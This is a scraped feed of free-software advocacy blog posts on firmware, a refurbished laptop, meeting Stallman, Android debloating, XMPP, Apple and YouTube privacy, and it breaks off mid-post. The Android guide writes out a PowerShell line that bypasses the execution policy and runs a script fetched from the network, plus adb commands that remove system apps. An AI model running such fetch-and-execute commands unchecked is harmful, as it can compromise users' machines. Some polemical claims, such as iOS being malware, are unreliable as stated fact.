future.",[],{"slug":2004,"title":2005,"link":2006,"pubDate":2007,"contentSnippet":2008,"tags":2009,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"firmware","Ethical issues regarding firmware","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffirmware\u002F","Mon, 06 Sep 2021 00:00:00 +0000","Index\nWhat is firmware\nProblems with proprietary firmware\nImportance of Free Firmware\nWhat is firmware\nFirmware is a software which provides a way for hardware to interact with the operating system. It runs on a secondary processor and not on the CPU. For example the WiFi chipset will run this code directly instead of the main CPU. Firmware files aren’t used by the kernel, they’re loaded by the kernel onto other pieces of hardware.\nQuoting Debian wiki on what is Firmware:\nFirmware refers to embedded software which controls electronic devices. Well-defined boundaries between firmware and software do not exist, as both terms cover some of the same code. Typically, the term firmware deals with low-level operations in a device, without which the device would be completely non-functional.\nFor example, remote control of a television uses firmware to convert your button presses into infrared signals so that the television can understand. For more examples of firmware, please check this wiki page.\nLet’s suppose you are able to boot and install a free software operating system, like any GNU\u002FLinux based Operating System and you did not install any nonfree software. You might be tempted to say that you are running only free software but you might still be running proprietary firmware. For example, Ubuntu comes pre-installed with nonfree firmware. Depending upon your laptop, you might need to install nonfree firmware in addition to the operating system for some hardware to work properly.\nProblems with proprietary firmware\nThe problem with propietary firmware is the same as any propietary software– users do not control it and we cannot trust it. It does not give users the freedom and therefore users do not have a defence against any of the bugs or intentional malfunctionalities being introduced in the system.\nQuoting Mark Shuttleworth, the founder of Canonical which develops and maintains Ubuntu,\nIf you read the catalogue of spy tools and digital weaponry provided to us by Edward Snowden, you’ll see that firmware on your device is the NSA’s best friend.\nFollowing are some known examples of insecurity issues due to bugs or adding intentional malfunctionalities at firmware level:\nA researcher broke into Apple’s firmware and caused the battery to overcharge\nNSA adds spyware into firmware of many devices.\nWikileaks revealed that several CIA projects infect Apple Mac firmware (meaning the infection persists even if the operating system is re-installed). Basically, EFI\u002FUEFI is essentially a backdoor for taking control of a computer without user’s knowledge. Further, the attacks described in the leaks are very widespread.\nA vulnerability in the EFI\u002FUEFI firmware is used by CIA to write to NVRAM or persistent storage of the computer without the users knowing about it. It cannot be detected easily by the users and it can survive a complete OS reinstall.\nCIA documents leaked by the Wikileaks note that the UEFI level exploits can compromise the whole system. The ExitBootServices Hooking page notes, “At this point, you can do whatever you want.”\nKeep in mind that if a backdoor is installed at the firmware level, it can gain full access to your computer. Such a control of the system means that the applications running on your machine are also fully compromised.\nImportance of free firmware\nIn the previous section, we explored that the issue of firmware being propietary and hence, not controlled by the user, is not a light issue at all. It is a very serious issue and the well-known exploits in these firmware can make you a prey to NSA or any third-party spying without you even knowing.\nThe firmware should be free software as any software so that the users have freedom to detect and fix bugs, remove any backdoors put into the firmware, and other problems that can arise with proprietary firmware. For this, the manufacturers need to publish key technical specifications sufficient to write free firmware for their hardware. Even if you are running proprietary firmware and ditch Windows or MacOS or any proprietary operating system to switch to a free software operating system, like GNU\u002FLinux, I welcome your move as one more step towards freedom.\nA very important example of a firmware is BIOS, which starts your computer when you power it on. Libreboot and Coreboot are free software BIOS.\nLiberated Computer (the laptop I use) runs on Coreboot and the only nonfree software it has is the Intel ME blob which is disabled.That means it runs purely free software.\nThe following devices have only free firmware installed at the time of shipping:\nDevices which can run Replicant OS (Note: You might have to use external hardware\u002Fdongles for WiFi, Bluetooth to work)\nDevices that have Libreboot support\nDevices which are RYF certified by FSF\nUnfortunately, proprietary firmware is not even considered a problem by many people who care about software freedom. Perhaps there is a lack of awareness of the issue. If that is the case, then hopefully I have now made you aware of the issues with proprietary firmware.\n(Credits: Thanks to Pirate Praveen for proofreading the article and correcting some factual errors.)\nFor further reading:\nDebian wiki.",[],{"slug":2011,"title":2012,"link":2013,"pubDate":2014,"contentSnippet":2015,"tags":2016,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"liberated-computer","Liberated Computer Review","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fliberated-computer\u002F","Sun, 05 Sep 2021 00:00:00 +0000","Update: Added some pictures on 29-April-2022.\nWhat is Liberated Computer\nLiberated Computer is a computer sold by LibreTech Shop based in Bangalore, India, which can run exclusively on free software (which means it respects user’s freedom and not that it is free-of-cost) and does not ship with any proprietary software installed. Liberated Computers are basically old and refurbished Lenovo’s Thinkpad laptops, modified in several ways so that they can run purely free software (check the section “How is an LC230 assembled?” in LC 230 docs). In addition, it respects user’s hardware freedom as well– you can do whatever you wish to do with the hardware, with no locks or constraints imposed by the manufacturer.\nThe computer is liberated by replacing the BIOS which won’t let a chip run which is not in its allow list. Further, the Intel ME backdoor has been disabled.\nIt has Coreboot whose code is 100% free software. The x230 BIOS contains the Intel management engine - which is then neutered using me_cleaner. That is a blob (A blob means a device driver whose source code is not published, only the binary is published; blobs are nonfree software) but that blob is inactive during the course of normal working of the operating system. There is no other blob in Liberated Computer. I will explain why free firmware matters in the next post. This makes Liberated Computer run on 100% free software.\nHere is a screenshot of a tweet by Leah Rowe, the founder of Libreboot project, on Lenovo x230(Remember that Liberated Computer is just refurbished Lenovo’s x230) and Coreboot.\n\nWhy I bought Liberated Computer\nI bought a Liberated Computer and the reason is simple: the attitude that freedom comes first and features are secondary. Free Software provides users the freedom to run, study, modify, improve, share the software. If the software lacks any of these freedoms, it is called nonfree\u002Fproprietary software.\nI think free software is necessary for:\nprivacy and security of users, though it might not be sufficient;\nlearning and doing things ourselves;\nhaving a defence against the mistreatment by proprietary software.\nThere are many other reasons to use free software.\nI also think that the freedoms provided by free software are every user’s rights. I am not of the opinion that we use any software that works, but the software should respect user’s freedom. Naturally, I would like to run only free software and eliminate all the nonfree software from my life.\nMy Purchase\nI used to have Apple’s Macbook which is a very locked system and you don’t own it even after purchasing it. After I got convinced that software freedom is important, I tried to use only free software and avoid proprietary software as much as possible. However, a lot of free software for my use was not available for Macbook. And I doubt if Macbook can run without any proprietary software. Therefore, I was looking for a computer which can run exclusively on free software, without requiring any proprietary software. I knew that Librem laptops can run purely free software and they satisfied my requirement. I didn’t know about any Indian vendors selling such a laptop. One day, I asked in the FSCI matrix room whether there are Indian shops selling such a laptop. I came to know about Libretech Shop based in Bangalore which sells free software powered laptops and calls them ‘Liberated Computer’. A few months later, I decided to buy a LC 230.\nI ordered LC 230 using the Mostly Harmless website, with 16 GB RAM, 480 GB SSD, and a new 6-cell battery.\nItem Description\nAmount (INR)\n\n\n\n\nBase Price\n₹ 27,000.00\n\n\nRAM (16 GB)\n₹ 3,500.00\n\n\nSSD (480 GB)\n₹ 2,500.00\n\n\nNew Battery (6-cell Battery)\n₹ 3,500.00\n\n\nSubtotal\n₹ 36,500.00\n\n\nShipping (Flat Rate)\n₹ 1,200.00\n\n\nGST\n₹ 6,786.00\n\n\nTotal\n₹ 44,486.00\n\n\n\nI placed my order on a Saturday. Abhas shipped it to me, three days later, on Tuesday via DTDC priority shipping and I received the laptop on Thursday.\nMy experience with LC 230\nThe laptop had KDE Neon pre-installed but Abhas (the owner of the shop where I purchased Liberated Computer) suggested me to re-install any OS of my choice on my own. I re-installed KDE Neon using a bootable USB. I explored KDE Neon and liked it. I found it user-friendly and got comfortable in a few hours.\nThen I booted PureOS, Ubuntu, Kubuntu, Manjaro KDE, Solus Budgie etc. Finally, I settled on Debian 11 KDE and I am using it as my main OS right now.\nThe new battery lasts around 5 hours from full charged state to zero.\nThe low speaker volume is somewhat offputting. Instead of a backlit keyboard, it has a Thinklight which flashes light on the keyboard to work in the dark.\nIt has hardware kill switches for microphone, audio and wireless connections. It has a webcam too.\nSwitched to GNU\u002FLinux\nFinally, I switched to GNU\u002FLinux. The GNU\u002FLinux operating systems are free software and are fully under user’s control and this is exactly my reason for the switch. Nonfree software macOS and Windows are full of trackers. Debian, on the other hand, does not have any trackers or spywares. It respects my freedom and privacy.\nHappy Hacking!\nPictures\nFollowing are some pictures of Liberated Computer taken by me. All of them are released under CC-BY-SA license.\n\nLiberated Computer running official ISO(which has free firmware) of Debian GNU\u002FLinux with Mate desktop.\n\n\n\n\n Liberated Computer running PureOS.\n\n\n\n\n Liberated Computer running PureOS.\n\n\n\n\n Liberated Computer running PureOS.\n\n\n\n\n Liberated Computer running Coreboot.\n\n\n\n\n Liberated Computer keypad and touchpad.\n\n\n\n\nTails OS running in Liberated Computer.\n\n\n\n\nFedora 35 live USB running in Liberated Computer.\n\n\n\n\nUbuntu 20.04.3 LTS live USB running in Liberated Computer.\n\n\n\n\nUbuntu Desktop in Liberated Computer.\n\n\n\n\nManjaro KDE 21.2.1 running on Liberated Computer.\n\n\n\n\nTrisquel 10 desktop in Liberated Computer.\n\n\n\n\nManjaro running in Liberated Computer.\n\n\n\n\nTrisquel 10.0 running in Liberated Computer.",[],{"slug":2018,"title":2019,"link":2020,"pubDate":2021,"contentSnippet":2022,"tags":2023,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"meeting-rms","My Meeting with Richard Stallman","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fmeeting-rms\u002F","Sat, 31 Jul 2021 00:00:00 +0000","I am writing about a meeting which happened more than 5 years before writing this article. This is the best recreation from memory I came up with.\nAt the time this happened, I was a student at Acharya Narendra Dev College (also known as “ANDC” in short), New Delhi. On the 1st of March 2016, the principal of my college, Dr. Savithri Singh, was addressing all the students in a common hall (for some reason I don’t remember). During the address, she told us that the founder of Linux was visiting our college that day. She invited interested students to meet him to her office at 4 PM. I was sitting with my friend, Shivam Rai who was excited for the meeting. I am from mathematics background and hardly knew anything about Linux. I had heard the word “Linux” and knew that it is a kernel of some operating system. So, I wasn’t very entusiastic.\nAround 4 PM, I was a bit tired and wanted to go back to my room to take a nap. I was not completely sure about the point of the meeting. Furthermore, I thought they discuss programming or coding like mathematicians discuss theorems and proofs. I almost forgot about it. However, my friend reminded me of the meeting, so I joined him.\nWe went to the principal office and after waiting for some time, the visitor arrived along with a person from Kerala. My friend and I shook hands with the visitor, and he said, “Hi, my name is Richard Stallman”. We also introduced ourselves. The person from Kerala also introduced himself but unfortunately, I forgot his name. Immediately, Richard Stallman asked us a question in a joking manner, “If I were to start a company in India, what should I name it?”. We were silent. Then he said, “Mahadeva” followed by a big laughter.\nIt turned out that, even though the principal invited the whole college to meet Richard Stallman, only two of us actually went to meet him. Next, since the principal said that he is a founder of Linux, we started the discussion something along the lines of “You are the founder of Linux?” Listening to this, he got angry and said, “You should ask that question from Linus Torvalds.” I was confused at this point, and so was my friend.\nThen we asked, “What do you work for?”. He responded, “I work for GNU.” I asked, “What’s that?” He said, “GNU’s not Unix.” I got very confused at this point as I didn’t know what’s GNU, what’s Unix, and we already pissed him off by associating him with Linux.\nThen, he said, “I work for free software.” This added to my confusion as I thought why would someone work for free-of-cost software. Then he explained what is free software, “Free Software is software that gives users four freedoms.\nFreedom 0 is the freedom to run the software as you wish.\nFreedom 1 is the freedom to study and modify the program. You need to have the source code of the program to exercise this freedom.\nFreedom 2 is the freedom to share the program.\nFreedom 3 is the freedom to share your modified versions.\nThe ‘free’ does not mean free of cost. It means freedom. Think of it like free speech and not free beer.”\nAt that point, I only knew that a lot of programs do not have freedom 1. I didn’t know that a lot of software do not give users the freedom to share or run. So naturally, I didn’t understand why he has to emphasize these freedoms and why they are important. Also, I used to think every software have freedoms 0,2,3. I remember having a (wrong) notion  that the freedom to study and modify the source code is for the programmers only.\nThen, he said, “Any software which does not give users these four freedoms is called a nonfree\u002Fproprietary software. A proprietary software is under developer’s control, and you are at the mercy of the developer. A free software is controlled by its users. I use only free software and reject all proprietary software and, you should do it too.”\nHis voice was quite passionate when he was telling us those things. Further, he told us that Microsoft Windows is an example of a proprietary software and mentioned that a backdoor was found in Windows in the past. I didn’t know what backdoor means and I don’t remember if he told us that.\nHe had hearing problems, so we had to be loud while interacting with him. My friend then asked about Apple’s software. Something like “Is Apple’s software secure?” Stallman replied something related to Apple’s locking of user and Apple’s software being nonfree. Bu I forgot a lot of at he said.\nI remember that he also said that Google services are surveillance systems, and he does not use them. He insisted that we should also refuse to use them. I remember him mentioning that NSA spies on Americans as well as other countries’ citizens using Google services like Gmail, Google Maps. Poor me, I didn’t know what is NSA.\nHe also mentioned that Google Maps does not load if he disables the Javascript code sent by the site. Earlier, it used to load without Javascript. He kind of implied that sites should load without Javascript. And he probably gave a few more examples when disabling Javascript does not load the website. At that time, I didn’t understand why would someone disable Javascript when visiting a website.\nThen, our principal reminded us to take photos with Richard Stallman. Stallman agreed with the condition that we never upload his photo on Facebook, Instagram or WhatsApp, because that company is a surveillance engine, and we should not feed it. We agreed with the condition and clicked photos with him.\nMy photo with RMS\n\nRichard Stallman was then treated with Dal Vada from our college canteen, and he really liked that.\nThis meeting planted a few questions in my mind about the software I was using. At that time, I didn’t have adequate political understanding to get his point. I also found it a bit sad that the person is known for “Linux” and “Open Source”, even though he despises those labels.",[],{"slug":2025,"title":2026,"link":2027,"pubDate":2028,"contentSnippet":2029,"tags":2030,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"how-i-removed-gapps","How I deleted Google, Samsung apps from my Android without rooting","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fhow-i-removed-gapps\u002F","Tue, 27 Jul 2021 00:00:00 +0000","In this post, I will write how I deleted (yes, deleted, uninstalled, gone! not disabled) Google apps, Samsung apps and Facebook app from my phone. These apps are pre-installed and they only give an option to “Diasble” these apps which does not do anything, it only stops showing them in the app drawer. These apps are dangerous to user’s privacy and record their whole lives through their phones. You do not need to know anything about the command line to follow this guide.\nshowTableOfContents: true\nSahil’s blog post on Mobile Made More Private was the one which guided me in this process. Be sure to check out that for more details and the adb commands cheat sheet that Sahil mentions in that post.\nA fair warning and comment from Chris Titus Tech:\nIt is dangerous to remove system apps that you don’t see in the app drawer. It can lead to you doing a full system recovery.\nOn Non-Rooted phones some applications are installed as root and error with “[DELETE_FAILED_INTERNAL_ERROR]”. Type this to bypass:\nadb shell pm uninstall –user 0 \nSo, it is a “Do at your own risk” article.\nHow I did it\nI have a Samsung Galaxy S9+ phone with Google and Samsung’s nonfree software installed in it. I did not yet root my phone to install a custom ROM. I have a Macbook which does not allow me to connect my Android using a USB cable, a step which is essential to run command line in your android to uninstall these apps.\nSo, I connected my phone to a laptop in which Windows 10 was installed. The steps are similar and commands are same (except for the grep command which works in GNU\u002FLinux but not in Windows, which I will mention) if you using GNU\u002FLinux or macOS.\nThese are the steps I followed in Windows 10:\nStep 1 : Install chocolatey, a freedom-respecting command line program to download software in Widnows. The steps to install Chocolatey are here. You don’t need to visit that link, I will write all the steps for you.\nBelow are the steps for installing Chocolatey on Windows.\nStep 1a : Press windows button on your keyboard and search for ‘PowerShell’. Right click on PowerShell and click on an option which says run it in the administrator mode.\nStep 1b : In the PowerShell, run the command (which means, copy the following command and paste it in PowerShell and press enter on Keyboard):\nGet-ExecutionPolicy\nIf it returns Restricted, run the command:\nSet-ExecutionPolicy AllSigned\nStep 1c : Run the following command:\nSet-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https:\u002F\u002Fchocolatey.org\u002Finstall.ps1'))\nIf you do not get any error message, congratulations! Chocolatey is installed in your system.\nType choco -? in the command line and press enter. If there is no error, it means that Chocolatey has been installed in your system.\nStep 2 : We will install ADB Platform Tools. To install, run the command:\nchoco install adb\nStep 3 : Setting up your Android phone\n3a :  Open Settings on your phone, and select “About”.\n3b : Tap on “Build number” seven times.\n3c : Go back, and select “Developer options”.\n3d : Scroll down, and check the “Android debugging” or “USB debugging” entry under “Debugging”.\n3e : Plug your device into your computer.\n3f : On the computer, open up a terminal\u002Fcommand prompt and type adb devices.\n3g : A dialog should show on your device, asking you to allow usb debugging. Check “always allow”, and choose “OK”.\nStep 4 : Run the command:\nadb devices\nThis command should list the Android phone you connected to your computer. If it lists your phone, you are ready to proceed. Otherwise, your phone isn’t connected and not ready to use adb commands.\nStep 5 : You can list all the packages of Google in your phone by using the command:\nIn Windows: adb shell pm list packages | findstr google \nIn GNU\u002FLinux or macOS: adb shell pm list packages | grep google \nThe following image has commands that can be used to uninstall Google apps.\n Uninstall Google apps from Android using adb commands\n\n\nUninstalling the apps\nLet’s try and uninstall the YouTube app. Check the image above for the package name. The package name for YouTube is com.google.android.youtube. The following command should be the one to uninstall YouTube (same command for Windows, macOS, GNU\u002FLinux):\nadb shell pm uninstall -k --user 0 com.google.android.youtube\nIf the command returns the message saying: Success, then you have successfully uninstalled YouTube.\nSimilarly, you can uninstall any other app using this command by replacing com.google.android.youtube by the package name of the app.\nFor removing Google Play Store, I used the following command:\nadb shell pm uninstall -k --user 0 com.android.vending\nFor me, it was no problem uninstalling Google Play Store but I have heard it can be risky.\nI have listed all the commands that I tried in my phone in adb-commands-ravi.txt. Feel free to use some or all of these commands.\nA trick to know the app ID for most of the apps is to visit their Google Play Store page. For example, visit the Facebook app on Google Play Store and look at the URL. Copy the part after id= which is com.facebook.katana.\n To retrieve package name of an app\n\nTherefore, the command to uninstall Facebook will be:\nadb shell pm uninstall -k --user 0 com.facebook.katana\nThat’s it for now.\nHappy Hacking with (hopefully) less amount of tracking:)",[],{"slug":2032,"title":2033,"link":2034,"pubDate":2035,"contentSnippet":2036,"tags":2037,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"xmpp-guide","A guide to set up your XMPP account","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fxmpp-guide\u002F","Sat, 24 Jul 2021 00:00:00 +0000","This is a guide to set up an account on XMPP, which is a federated chatting system.\nYou can watch this video tutorial to create an XMPP account without giving your phone number to the service:\n\nI will use the freedom-respecting software Conversations app for demonstration. Conversations app is available for Android only. Conversations is a paid app on Google Play Store. If you would like to support the development of Conversations app, then you can download it from Google Play Store. Otherwise, you can follow the steps below to download Conversations app free of cost. If you would like to download a free-of-cost XMPP app from Play Store, then check out Blabber app.\nCurrently, Blabber app is very good for XMPP. It has some more functionality than Conversations app and these features are usually requested by users in the Conversations app.\nSome examples of XMPP apps for other platforms are- Dino for GNU\u002FLinux, Gajim for Windows and GNU\u002FLinux, Monal for macOS and iOS.  You can choose any XMPP app, and this guide probably works for all of them. A list of XMPP apps is here and all of them support OMEMO encryption by default.\nYou don’t need to give any personal details, like phone number or email, to create an account. If you would like to register an XMPP account using your phone number (similar to how you set up in WhatsApp), then you can try Quicksy app, which respects your freedom as you can still connect to people using any XMPP app and XMPP service provider (remember that XMPP is federated!).\nSteps to set up an account on Conversations app:\nStep 1: Download F-Droid from here.\nF-Droid is a repository of free software apps. It is a privacy respecting alternative of Google Play Store. One difference is that F-Droid only contains apps which are freedom-respecting (they respect all four freedoms mentioned here) and verified by the F-Droid community for malicious features.\nF-Droid will also ensure that your app receives all the future updates. F-Droid community also builds apps from the source code which ensures that the source code indeed matches the app you download in your system.\nStep 2: Search for “Conversations” app in F-Droid and install it.\nStep 3: Register an XMPP account on any xmpp server. You can choose an XMPP service provider from this URL. It will give you a list of 5 servers that you can register on, and then will give you 5 different random servers upon refreshing the page.\nStep 4: Open the Conversations app and then click on ‘I already have an account’ option.\nStep 5: In the XMPP address option, put your xmpp address, which will be of the format username@domain  – depending on which site you used to sign up. Click ‘Next’.\nStep 6: You can add a profile picture if you wish and then click ‘Publish’. If you do not want to add a profile picture, select ‘Skip’.\nStep 7: Conversations app will ask you permission to access your contacts. You can click on ‘Deny’. And it will then ask to stop battery optimization for the app. You can enable Conversations to run in the background.\nStep 8:  Conversations app will then ask you to stop battery optimization for the app. I suggest you to allow Conversations to run without optimizing the battery. The developer of Conversations app has explained how this permission has virtually zero impact on battery life.\nStep 9: To add a contact, press the ‘+’ button at the bottom of the Conversations app and click on ‘Add Contact’.\nStep 10: Type the XMPP address of the XMPP user you want to contact. In the image, I have entered my own XMPP address - ravi@poddery.com - as an example.\nStep 11: Just send an introduction message to your friend to exchange your OMEMO keys.\nCongratulations on setting up your XMPP account. All the messages will be OMEMO encrypted by default – means that only you and the person you are exchanging messages with can read them. Conversations app also support voice call and video call to any XMPP app that supports the same.",[],{"slug":2039,"title":2040,"link":2041,"pubDate":2042,"contentSnippet":2043,"tags":2044,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"fsci-jmc","My experience in volunteering for FSCI's Jitsi Meet Crowdfunding campaign","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffsci-jmc\u002F","Wed, 21 Jul 2021 00:00:00 +0000","showTableOfContents: true\nFree Software Community of India(FSCI) is committed to promote software freedom and make privacy accessible to common people. Campaigning and raising awareness for privacy and urging people to not use Google\u002FFacebook\u002FZoom and other proprietary services is not enough, users must also have alternatives to these services which were pretty much turned into necessity (for privileged people) especially in the pandemic time. Jitsi is a freedom-respecting video-conferencing software which gives users the control over the software. Jitsi allows anyone to run their own server, allowing them to fully control their means of communication. Since it is not feasible for everyone to run their own Jitsi server, FSCI decided to work on running their own server which would be open to all, can be used by anyone for their meetings, funded by voluntary donations and must respect user’s privacy.\nTo run a server funded by donations, we needed volunteers for: running and maintaining a Jitsi server, writing script for the fundraiser video, asking for donations in the fundraiser video, editing the fundraiser video, maintaining website, giving a bank account to accept donations, replying to emails regarding queries, taking initiative and coordinating all this.\nI think it was around November 2020 when Sahil told me about FSCI’s initiative to run a Jitsi server and I agreed to volunteer for asking for donations in the fundraiser video. Arun Mathai guided me in the process. We had meetings and we rehearsed the script a few times and assigned the lines. I had some problems shooting the video of myself speaking in the camera. Talking to myself alone on camera is not exactly my plus point. After several attempts, I could make a clip which was fine to be included in the fundraiser video (thanks to mom for shooting the clip).\nWe thought it would be good if there is diversity among the people asking for donations in the fundraiser video. So, I asked my friend Ashutosh, who is also inclined towards free software, if he can help. Then he discussed the fundraiser with his friends and two of his friends volunteered to appear in the video to ask for doantions. This opportunity raised awareness about free software and existence of community-powered services among his friends – which furthers our goal. I also asked my friend Sayan for recording the Bengali snippet of the video and he agreed to volunteer for the same.\nIt took some months after that (we did all of the above by the end of December 2020) to finally release the website and the Jitsi server acutally operational. After the release, we, at FSCI, use meet.fsci.in for all our meetings. I use this server for all my personal meetings.\nI am glad that the fundraiser is going strong – as of writing, we have raised 57% of the funds needed to run the service for 2 years. As of now, I think that drafting the privacy policy is a pending major task which I will try to do as soon as possbile.\nYou are invited to use the Jitsi server at meet.fsci.in for your personal meeting needs without worrying about someone prying on you. You can also host your classes. The server can handle around 30 participants in a meeting. If you would like to support the service, you can donate by visitng here or volunteer to help us in running the service by contacting FSCI. The transparency is ensured by listing all the contributors and their donation amounts publicly (you can be an anonymous contributor).\nPlease send your comments\u002Fsuggestions on the fundraiser\u002Fmeet server to FSCI (the contact option is at the bottom of the link.\nThanks to all the volunteers and contributors for making meet.fsci.in possible.",[],{"slug":2046,"title":2047,"link":2048,"pubDate":2049,"contentSnippet":2050,"tags":2051,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"apple-trap","Apple's privacy trap","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fapple-trap\u002F","Tue, 13 Jul 2021 00:00:00 +0000","Apple is a company which claims that protecting users’ privacy is one of their core values. Recently, they announced a new software update to their iOS with the idea that the apps made by independent developers have to request explicit permission from users before tracking them.\nThat means Apple cares about users’ privacy.\nOr do they?\nSure, they are not involved in targeted advertising, and they don’t earn money from your data and therefore, do not track you, right?\nAnd they encrypt all contents of iOS devices, making it impossible for third-parties to access your data, right?\nThey are working day and night to make your life better, convenient and at the same time, defend your privacy. What more can we ask for?\nWell ….. we don’t know if any of these claims are true\nbecause Apple’s iOS is a nonfree\u002Fproprietary program, and therefore these claims cannot be independently verified. Apple does not give its users the freedom to study how iOS works– it does not provide its source code.\n Proprietary Software controls the user.  Source: Richard Stallman's Ted talk slides released under CC-BY 3.0 license.\n\n\nEven if Apple’s claims are true, this only means you get privacy from others and not from Apple. They might be encrypting all your contents stored in iOS, we don’t know, but they have also installed backdoors. This means Apple can make changes in your devices remotely without your permission. They can add any malicious features in the software at any time without you knowing. The backdoors were found in macOS as well as in the iOS. That means your computer isn’t yours.\nWhile Apple says that it respects its user’s privacy, their track-record says exactly the opposite.\nSnowden’s documents show that Apple is a part of NSA’s global surveillance program.\nIn China, it stores all user data on servers controlled by the Chinese government.\nAll the search queries made in macOS’ spotlight are send to Apple.\nApple uploaded private files of its user to iCloud without consent.\nYou remember who is Siri? Siri is Apple’s voice assistant. It is Apple’s voice assistant, not your voice assistant. You might think that Siri listens to you only when prompted, but it turns out that it listens and records all the time. Apple also hires people specifically for listening to users’ Siri recordings.\nYou can check out more cases of surveillance by Apple by visiting this link.\nCory Doctorow argues that surrendering your autonomy by moving to Apple’s fortress has the same problem as all benevolent dictatorships: it works well, but fails badly.  Let me quote Cory Doctorow from this article,\nApple rightly points out that the world is full of bandits who will steal your data and money and ruin your life, and it holds itself out as your protector …. But when Apple sides with the bandits, the walls\nthat once protected you now make you easy prey.\nOverall, Apple claims itself to be the guardian protecting its users’ privacy, while their track record is exactly the opposite, they increased surveillance on users with the latest macOS update, they won’t allow third-party repair shops but their “authorized” technicians themselves leak users’ data. Apple’s privacy claims, at their best, only give users privacy from third-parties. That is what their privacy trap is– Redefine privacy to mean privacy from others and earn goodwill by advertising that they care about users’ privacy. Surveillance is just a symptom of proprietary software. The bigger problem is that Apple keeps tight control over iDevices and users don’t control them.\nThe only software we can trust is free software, which respects user’s freedom. Users have control over the software if it is free software. If the software is free, users can check for malicious code and remove the malicious functionalities.\n Free Software respects your freedom. Source: Richard Stallman's Ted talk slides released under CC-BY 3.0 license.\n\nA nonfree software, on the other hand, is malware. Apple’s iOS is malware because it is nonfree software. It is a black box. We never know what it is up to, so any trust on Apple respecting user’s privacy is a blind trust.",[],{"slug":2053,"title":2054,"link":2055,"pubDate":2056,"contentSnippet":2057,"tags":2058,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"accessing-youtube","Accessing YouTube without giving away your privacy","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Faccessing-youtube\u002F","Mon, 12 Jul 2021 00:00:00 +0000","YouTube is a platform where people upload and watch videos. I don’t think YouTube needs any introduction among the internet users. The thing that is not usually mentioned about YouTube is that it tracks its users. Further, YouTube’s algorithms distort the truth, it censors works that are fair use under the copyright law and doesn’t let you download videos in your device, even the ones you purchased.\nAn analysis of YouTube’s privacy policy is here.\nIn short, it is not YouTube, it is TheirTube. Knowing someone is always watching you has inhibiting effects. I don’t want to get tracked or get manipulated by YouTube’s algorithms. Fortunately, YouTube is accessible using free software in ways which respect your privacy. I will list some ways to watch YouTube videos using workarounds. All the software mentioned here are free software(which means they respect your freedom). Please read this article to understand why we must insist on free software.\nIn Desktop, YouTube videos can be watched using Invidious. You can visit any of the Invidious instances here from any browser and search for the video you would like to watch. Invidious also allows you to visit via Tor which hides your IP Address. You can use Privacy Redirect plugin in Firefox and Tor to automatically redirect YouTube links to Invidious. This plugin also redirects Twitter, Instagram, Reddit, Google Maps, Google Translate links to their privacy-respecting front-ends. You can also check out a bunch of other freedom-respecting software that you can use to watch YouTube videos.\nPiped is a free software which acts as a frontend to YouTube. You can watch YouTube videos using Piped in your browser by visiting this URL. Piped does not expose your IP address to YouTube.\nFreeTube app can also be used to watch YouTube videos. The app is available for all the GNU\u002FLinux distros, macOS and Windows. FreeTube respects your privacy as well. Please read privacy section of their FAQ for details.\nYoutube-dl is another software you can use on Desktop to watch videos. It is a command-line program that downloads videos from YouTube in your system. It is my favorite, and I fell in love with it when I realized how capable it is. It is very powerful, and it supports downloading videos from many other sites as well. You can also download audio files by extracting audio from YouTube videos using YouTube-dl. It supports downloading playlists as well. I plan to write a blog in future on using command-line to download using youtube-dl for beginners.\nFor Android, Newpipe app can be used to watch YouTube videos. Newpipe app shows no ads, does not track you, can run in background, can download audio\u002Fvideo files in your phone. Newpipe can also stream videos which are being live-streamed on YouTube. In addition to YouTube, you can access SoundCloud, media.ccc.de, PeerTube instances ,Bandcamp using NewPipe.\nFor iOS, I don’t know any workarounds. If you know of any, please let me know. iOS is, in general, very hostile to user freedom, so the only way to freedom is to avoid iOS.\nWhile these workarounds work well, we cannot rely on Google to let them work. The workarounds do not really solve the problem. The real solution is that the videos are posted on a platform which respects user’s freedom(which is a bit more complicated issue than the freedom of software installed in your system). You can upload videos on Peertube or your own website to respect user’s freedom and allow them to download the videos as well. I have a channel on Peertube on the instance set up by FSCI. You can set up a donation based model to earn money from your videos. Users can send you money directly in your account for your work. You can also earn money by selling merchandise. For this model to be successful, we need more people to join in rejecting YouTube and similar tracking services.",[],{"slug":2060,"title":2061,"link":2062,"pubDate":2056,"contentSnippet":2063,"tags":2064,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"chatting-apps","Choosing a privacy-respecting chatting app","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fchatting-apps\u002F","Which chatting app do you use to contact your loved ones?\nDo you use WhatsApp?\nDo you use Telegram or Signal?\nWhat if you do not agree to the terms and conditions or privacy policy of these apps?\nWell, either you need to accept their terms or switch to any other app and do the hard work of convincing every contact to move to your new chat app whose terms you can agree. What if you are a student and all the important notifications are sent to the WhatsApp group? Would you convince your school to avoid WhatsApp? What if they don’t care? Now you are forced to be on WhatsApp to make sure you don’t miss any important updates. So, when you click on ‘I Agree’ to the document which says, “We will put you in surveillance. It has a lot of benefits. Your life will be very convenient”, do you really agree, or you just gave in to social pressure? Or you did not care? Do you really have a choice?\n  Why SMS refuses to die. Source: https:\u002F\u002Fxkcd.com\u002F2365\u002F \n\nSo, how do we control our means of communications? What does controlling our communications mean? If we control our means of communications, can we ensure privacy as well? I will go 